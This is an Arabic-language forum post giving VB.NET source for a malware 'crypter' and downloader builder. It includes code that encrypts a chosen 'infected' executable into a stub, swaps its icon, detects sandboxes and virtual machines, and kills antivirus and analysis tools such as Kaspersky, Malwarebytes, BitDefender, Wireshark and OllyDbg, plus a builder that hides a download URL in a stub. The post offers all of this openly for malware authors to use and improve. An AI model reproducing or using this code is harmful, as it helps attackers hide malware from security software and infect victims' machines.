![]() |
[ نقاش ] كيفية عمل برنامج تشفير بخواص جديدة | بخوارزميات جديده | vb.net | لكل محترفي التشفير و البرم
http://img109.imageshack.us/img109/8279/besml.gif مرحبا بكل اعضاء و زوار منتدي الديف بوينت تحيه طيبه و بعد ,,, اليوم خطرت ببالي فكرة و ارجو تطويرها في منتدي التطوير الكبير http://img213.imageshack.us/img213/4...9718464373.png كيفية عمل برنامج تشفير بخواص جديده و رائعه بدون ما اطول عليكم ها طرح ما توصلت ايه و اريد منكم طرح افكاركم التطويريه http://img825.imageshack.us/img825/5061/58176002.gif http://img197.imageshack.us/img197/7...gseparator.gif واجهه البرنامج المتعدد الخواص ================================= وجهه الاولي عبارة عن * تشفير اي سيرفر + خاصيه تغيير ايقونه | اذا ادرت تغييرها http://img198.imageshack.us/img198/6...2012120646.gif http://img825.imageshack.us/img825/5061/58176002.gif الوجه الثاني عبارة عن اضافه خواص التخطي http://img211.imageshack.us/img211/7...2012120715.gif http://img825.imageshack.us/img825/5061/58176002.gif الوجه الثالث عبارة عن عمل دونلوودر http://img822.imageshack.us/img822/6...2012120736.gif http://img825.imageshack.us/img825/5061/58176002.gif اكواد البرنامج حتي الان [INFO]مع تغيير X علي حسب الرقم اللي موجود عندك في المشروع | اذا زر او تكست او الخ ...........[/INFO] 1-في حدث ضغط زر اختيار السيرفر | الملف التنفيذي | EXE كود: With OpenFileDialog1 .FileName = "" .Filter = "Executable(*.exe)|*.exe" .Title = "CrYpTeR V2.3 | M.Magdy DZ | HaCkEr " .ShowDialog() TextBoxX.Text = .FileName infectedfile = TextBoxX.Text End With If OpenFileDialogX.ShowDialog(Me) = DialogResult.OK Then TextBoxX.Text = String.Empty TextBoxX.Text = OpenFileDialog1.FileName End If لاختيار الملفات التنفيذية http://img825.imageshack.us/img825/5061/58176002.gif 2-في حدث ضغط زر لاختيار الايقونه كود: Dim ooo As New OpenFileDialog ooo.DefaultExt = "ico" ooo.Filter = "Icon Files (*.ico*)|*.ico*" ooo.FilterIndex = 1 ooo.FileName = "" ooo.Title = "CrYpTeR V2.3 | M.Magdy DZ | HaCkEr OFF LiNE" If ooo.ShowDialog(Me) = 1 Then Me.PictureBoxX.Image = Image.FromFile(ooo.FileName) TextBoxX.Text = ooo.FileName End If و في حدث CheckBoxX.Checked كود: If CheckBoxX.Checked = True Then TextBoxX.Enabled = True ButtonX.Enabled = True Else TextBoxX.Enabled = False ButtonX.Enabled = False End If http://img825.imageshack.us/img825/5061/58176002.gif 3- اضافه كلاس جديد | لعملية تغيير الايقونات ( لتسير بالشكل الصحيح ) كود: Option Strict On Option Explicit On Option Infer On Imports System.Runtime.InteropServices Imports System.Security Public Class IconChanger _ Private Class NativeMethods _ Public Shared Function BeginUpdateResource( _ ByVal fileName As String, _ ByVal deleteExistingResources As Boolean) As IntPtr End Function _ Public Shared Function UpdateResource( _ ByVal hUpdate As IntPtr, _ ByVal type As IntPtr, _ ByVal name As IntPtr, _ ByVal language As Short, _ _ ByVal data() As Byte, _ ByVal dataSize As Integer) As Boolean End Function _ Public Shared Function EndUpdateResource( _ ByVal hUpdate As IntPtr, _ ByVal discard As Boolean) As Boolean End Function End Class _ Private Structure ICONDIR Public Reserved As UShort Public Type As UShort Public Count As UShort End Structure _ Private Structure ICONDIRENTRY Public Width As Byte Public Height As Byte Public ColorCount As Byte Public Reserved As Byte Public Planes As UShort Public BitCount As UShort Public BytesInRes As Integer Public ImageOffset As Integer End Structure _ Private Structure BITMAPINFOHEADER Public Size As UInteger Public Width As Integer Public Height As Integer Public Planes As UShort Public BitCount As UShort Public Compression As UInteger Public SizeImage As UInteger Public XPelsPerMeter As Integer Public YPelsPerMeter As Integer Public ClrUsed As UInteger Public ClrImportant As UInteger End Structure _ Private Structure GRPICONDIRENTRY Public Width As Byte Public Height As Byte Public ColorCount As Byte Public Reserved As Byte Public Planes As UShort Public BitCount As UShort Public BytesInRes As Integer Public ID As UShort End Structure Public Shared Sub InjectIcon(ByVal exeFileName As String, ByVal iconFileName As String) InjectIcon(exeFileName, iconFileName, 1, 1) End Sub Public Shared Sub InjectIcon(ByVal exeFileName As String, ByVal iconFileName As String, ByVal iconGroupID As UInteger, ByVal iconBaseID As UInteger) Const RT_ICON As UInteger = 3UI Const RT_GROUP_ICON As UInteger = 14UI Dim iconFile As IconFile = iconFile.FromFile(iconFileName) Dim hUpdate = NativeMethods.BeginUpdateResource(exeFileName, False) Dim data = iconFile.CreateIconGroupData(iconBaseID) NativeMethods.UpdateResource(hUpdate, New IntPtr(RT_GROUP_ICON), New IntPtr(iconGroupID), 0, data, data.Length) For i = 0 To iconFile.ImageCount - 1 Dim image = iconFile.ImageData(i) NativeMethods.UpdateResource(hUpdate, New IntPtr(RT_ICON), New IntPtr(iconBaseID + i), 0, image, image.Length) Next NativeMethods.EndUpdateResource(hUpdate, False) End Sub Private Class IconFile Private iconDir As New ICONDIR Private iconEntry() As ICONDIRENTRY Private iconImage()() As Byte Public ReadOnly Property ImageCount() As Integer Get Return iconDir.Count End Get End Property Public ReadOnly Property ImageData(ByVal index As Integer) As Byte() Get Return iconImage(index) End Get End Property Private Sub New() End Sub Public Shared Function FromFile(ByVal filename As String) As IconFile Dim instance As New IconFile Dim fileBytes() As Byte = IO.File.ReadAllBytes(filename) Dim pinnedBytes = GCHandle.Alloc(fileBytes, GCHandleType.Pinned) instance.iconDir = DirectCast(Marshal.PtrToStructure(pinnedBytes.Addr OfPinnedObject, GetType(ICONDIR)), ICONDIR) instance.iconEntry = New ICONDIRENTRY(instance.iconDir.Count - 1) {} instance.iconImage = New Byte(instance.iconDir.Count - 1)() {} Dim offset = Marshal.SizeOf(instance.iconDir) Dim iconDirEntryType = GetType(ICONDIRENTRY) Dim size = Marshal.SizeOf(iconDirEntryType) For i = 0 To instance.iconDir.Count - 1 Dim entry = DirectCast(Marshal.PtrToStructure(New IntPtr(pinnedBytes.AddrOfPinnedObject.ToInt64 + offset), iconDirEntryType), ICONDIRENTRY) instance.iconEntry(i) = entry instance.iconImage(i) = New Byte(entry.BytesInRes - 1) {} Buffer.BlockCopy(fileBytes, entry.ImageOffset, instance.iconImage(i), 0, entry.BytesInRes) offset += size Next pinnedBytes.Free() Return instance End Function Public Function CreateIconGroupData(ByVal iconBaseID As UInteger) As Byte() Dim sizeOfIconGroupData As Integer = Marshal.SizeOf(GetType(ICONDIR)) + Marshal.SizeOf(GetType(GRPICONDIRENTRY)) * ImageCount Dim data(sizeOfIconGroupData - 1) As Byte Dim pinnedData = GCHandle.Alloc(data, GCHandleType.Pinned) Marshal.StructureToPtr(iconDir, pinnedData.AddrOfPinnedObject, False) Dim offset = Marshal.SizeOf(iconDir) For i = 0 To ImageCount - 1 Dim grpEntry As New GRPICONDIRENTRY Dim bitmapheader As New BITMAPINFOHEADER Dim pinnedBitmapInfoHeader = GCHandle.Alloc(bitmapheader, GCHandleType.Pinned) Marshal.Copy(ImageData(i), 0, pinnedBitmapInfoHeader.AddrOfPinnedObject, Marshal.SizeOf(GetType(BITMAPINFOHEADER))) pinnedBitmapInfoHeader.Free() grpEntry.Width = iconEntry(i).Width grpEntry.Height = iconEntry(i).Height grpEntry.ColorCount = iconEntry(i).ColorCount grpEntry.Reserved = iconEntry(i).Reserved grpEntry.Planes = bitmapheader.Planes grpEntry.BitCount = bitmapheader.BitCount grpEntry.BytesInRes = iconEntry(i).BytesInRes grpEntry.ID = CType(iconBaseID + i, UShort) Marshal.StructureToPtr(grpEntry, New IntPtr(pinnedData.AddrOfPinnedObject.ToInt64 + offset), False) offset += Marshal.SizeOf(GetType(GRPICONDIRENTRY)) Next pinnedData.Free() Return data End Function End Class End Class http://img825.imageshack.us/img825/5061/58176002.gif 4 - أضافه موديل جديد لاكواد التخطي كود: http://img825.imageshack.us/img825/5061/58176002.gifImports Microsoft.Win32 Module Antis Dim Devices As Object, Grafikadapter As String, RegionA As String = "SELECT * FROM Win32_VideoController" Dim regPID As RegistryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\Microso ft\Windows NT\CurrentVersion", False) Dim pid As Object = regPID.GetValue("ProductId") Dim id As String = "76487-337-8429955-22614" Public Function antiKAV() As Boolean On Error GoTo error1 If Process.GetProcessesByName("avp").Length >= 1 Then Return True Else Return False End If Exit Function error1: End End Function Public Function antiSandboxie() As Boolean On Error GoTo error1 If Process.GetProcessesByName("SbieSvc").Length >= 1 Then Return True Else Return False End If Exit Function error1: End End Function Public Function antiAnubis2() As Boolean On Error GoTo error1 If pid = id Then Return True Else Return False End If Exit Function error1: End End Function Public Function AntiVirtualBox() As Boolean On Error GoTo error1 Call getDevices() Select Case Grafikadapter Case "VirtualBox Graphics Adapter" Return True Case Else Return False End Select Exit Function error1: End End Function Public Function AntiVmWare() As Boolean On Error GoTo error1 Call getDevices() Select Case Grafikadapter Case "VMware SVGA II" Return True Case Else Return False End Select Exit Function error1: End End Function Public Function AntiVirtualPC() As Boolean On Error GoTo error1 Call getDevices() Select Case Grafikadapter Case "VM Additions S3 Trio32/64" Return True Case Else Return False End Select Exit Function error1: End End Function Private Sub getDevices() On Error GoTo error1 Devices = GetObject("winmgmts:").ExecQuery(RegionA) For Each AdaptList In Devices Grafikadapter = AdaptList.Description Next Exit Sub error1: End End Sub '------------------------Keyscrambler---------------------------- Sub AntiKeyscrambler() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "keyscrambler" generaldee(i).Kill() Case Else End Select Next End Sub '------------------------Wireshark---------------------------- Sub AntiWireshark() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "wireshark" generaldee(i).Kill() Case Else End Select Next End Sub '----------------------------Anubis-------------------------------- Sub AntiAnubis() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "anubis" generaldee(i).Kill() Case Else End Select Next End Sub '------------------------Malwarebytes---------------------------- Sub AntiMalwarebytes() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "mbam" generaldee(i).Kill() Case Else End Select Next End Sub '------------------------Kaspersky---------------------------- Sub AntiKaspersky() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "avp" generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Ollydbg--------------------------------- Sub AntiOllydbg() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "ollydbg" generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Outpost--------------------------------- Sub AntiOutpost() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "outpost" generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Norman------------------------------ Sub AntiNorman() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "npfmsg" generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Bit Defender------------------------------ Sub AntiBitDefender() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "bdagent" generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------NOD32------------------------------ Sub AntiNOD32() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "egui" generaldee(i).Kill() Case Else End Select Next End Sub '-----------------------Zone Alarm------------------------------ Sub AntiZoneAlarm() Dim generaldee As Process() = Process.GetProcesses Dim i As Integer For i = 0 To generaldee.Length - 1 Select Case Strings.LCase(generaldee(i).ProcessName) Case "zlclient" generaldee(i).Kill() Case Else End Select Next End Sub End Module 5 - و في حدث ضغط الزر للتشفير Crypt Button كود: Dim key As String = "3p699792sq691s854374n76841899n6p867nqr2r424770743 6n4776oo38083sn" Dim Splitt As String = "8bda087801ee923b02ff7a5447b6c9b8416da33aed3536bc3 aad1bf463442db5" Dim Cryptfile As String FileOpen(1, ("stub.exe"), OpenMode.Binary) stub = Space(LOF(1)) FileGet(1, stub) FileClose(1) FileOpen(1, (TextBoxX.Text), OpenMode.Binary) infectedfile = Space(LOF(1)) FileGet(1, infectedfile) FileClose(1) Cryptfile = infectedfile Dim oAesProvider As New RijndaelManaged Dim btClear() As Byte Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8} Dim oKeyGenerator As New Rfc2898DeriveBytes(key, btSalt) oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length) oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length) Dim ms As New IO.MemoryStream Dim cs As New CryptoStream(ms, _ oAesProvider.CreateEncryptor(), _ CryptoStreamMode.Write) btClear = System.Text.Encoding.UTF8.GetBytes(Cryptfile) cs.Write(btClear, 0, btClear.Length) cs.Close() Cryptfile = Convert.ToBase64String(ms.ToArray) FileOpen(1, (TextBoxX.Text & "-Crypted.exe"), OpenMode.Binary) FilePut(1, stub) FilePut(1, Splitt) FilePut(1, Cryptfile) FilePut(1, Splitt) FileClose(1) MsgBox("Error:") MsgBox("File Crypted Succesfully", MsgBoxStyle.Information, "Success") http://img825.imageshack.us/img825/5061/58176002.gif 6- في حدث الفورم لوود كود: For Fadein = 0.0 To 1.1 Step 0.1 Me.Opacity = Fadein Me.R e f r e s h() Threading.Thread.Sleep(100) Next CheckBoxX.CheckState = CheckState.Indeterminate [INFO]مع ازاله الفواصل من كلمه Me.R e f r e s h()[/INFO] http://img825.imageshack.us/img825/5061/58176002.gif 7- في بداية فورم البرنامج كود: Imports System.Security.Cryptography Imports System.IO Imports System.Text Imports System.Runtime.InteropServices Imports System.CodeDom.Compiler Public Class Form1 Dim infectedfile, stub As String http://img825.imageshack.us/img825/5061/58176002.gif 8- اضافه functions الخورزميات التشفيرية كود: Public Shared Function StrToByteArray(ByVal str As String) As Byte() Dim encoding As New System.Text.ASCIIEncoding() Return encoding.GetBytes(str) End Function كود: Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Integer) Function GetEOF(ByVal Path As String) As Long Dim ByteArray() As Byte Dim PE As Long, NumberOfSections As Integer Dim BeginLastSection As Long Dim RawSize As Long, RawOffset As Long FileOpen(10, Path, OpenMode.Binary, OpenAccess.Default) ReDim ByteArray(LOF(10) - 1) FileGet(10, ByteArray) FileClose(10) Call CopyMemory(PE, ByteArray(&H3C), 4) Call CopyMemory(NumberOfSections, ByteArray(PE + &H6), 2) BeginLastSection = PE + &HF8 + ((NumberOfSections - 1) * &H28) Call CopyMemory(RawSize, ByteArray(BeginLastSection + 16), 4) Call CopyMemory(RawOffset, ByteArray(BeginLastSection + 20), 4) GetEOF = RawSize + RawOffset End Function http://img825.imageshack.us/img825/5061/58176002.gif ثم اخيرا واجه عمل الدونلوودر كود: Dim stubX, textX, textX As String في حدث ضغط الزر لعمل الدونلوودر كود: If TextBoxX.Text = "" Then MsgBox("Oops, Looks like you forgot the URL!") Exit Sub End If If TextBoxX.Text = "" Then MsgBox("Oops, Looks like you forgot the filename!") Exit Sub End If Dim i As Short Dim KeyChar As Integer KeyChar = Asc("++") For i = 1 To Len(TextBoxX.Text) text1 &= Chr(KeyChar Xor Asc(Mid(TextBoxX.Text, i, 1))) Next KeyChar = Asc("++") For i = 1 To Len(TextBoxX.Text) text2 &= Chr(KeyChar Xor Asc(Mid(TextBoxX.Text, i, 1))) Next Const FileSplit = "@72389@" FileOpen(1, Application.StartupPath & "\StubX.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default) stub = Space(LOF(1)) FileGet(1, stub) FileClose(1) If File.Exists("server.exe") Then My.Computer.FileSystem.DeleteFile("server.exe") End If FileOpen(1, Application.StartupPath & "\Server.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) FilePut(1, stub & FileSplit & text1 & FileSplit & text2) FileClose(1) MsgBox("Server.exe file created!" + vbNewLine + "Bye Bye!") http://img825.imageshack.us/img825/5061/58176002.gif انتيهنا بحمد لله و مستني افكاركم التطويريه ( اكواد الستب | لبرنامج التشفير | و لعمل الدونلوودر | تنقصني ) كان معكم اخوكم M.Magdy DZ http://img163.imageshack.us/img163/5002/7b66f2beaf.gif |
الساعة الآن 03:26 PM |
Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point